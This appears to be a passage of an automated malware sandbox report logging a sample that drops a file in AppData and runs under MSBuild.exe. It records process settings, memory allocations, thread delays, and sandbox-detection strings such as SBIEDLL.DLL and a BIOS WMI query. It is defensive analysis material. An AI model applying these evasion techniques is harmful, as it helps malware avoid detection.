Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298AE8000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Memory allocated: 1A32B2B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Memory allocated: 1A344C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Memory allocated: 2592A400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Memory allocated: 25943EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory allocated: 1D296DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory allocated: 1D2B07F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory allocated: 20AF53A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory allocated: 20AF6CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Memory allocated: 18355F20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Memory allocated: 1836F9D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Memory allocated: 161F99C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Memory allocated: 161FB640000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599451
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599343
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599234
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599016
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598891
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598766
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598656
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598547
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598437
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598213
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598094
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597984
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597656
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597547
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597437
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597218
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597109
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596781
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596672
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596562
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596453
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596344
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596234
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596124
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595837
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595719
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595609
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594251
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594015
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593906
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593797
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593687
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593577
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593468
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593359
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593245
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599651
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599215
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598672
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598562
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598453
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598344
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598234
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598015
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597906
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597797
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597687
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597468
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597359
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597250
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597140
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597031
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596922
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596812
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596703
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596594
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596484
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596375
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596265
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596156
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596047
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595937
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595828
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595718
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595609
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595499
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595390
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595281
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595171
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595062
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594953
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594843
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594734
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594625

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1631
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 8217
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1396
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 8462

Source: C:\Users\user\Desktop\Pnihosiyvr.exe TID: 6524	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe TID: 4112	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe TID: 3536	Thread sleep time: -30000s >= -30000s	Jump to behavior
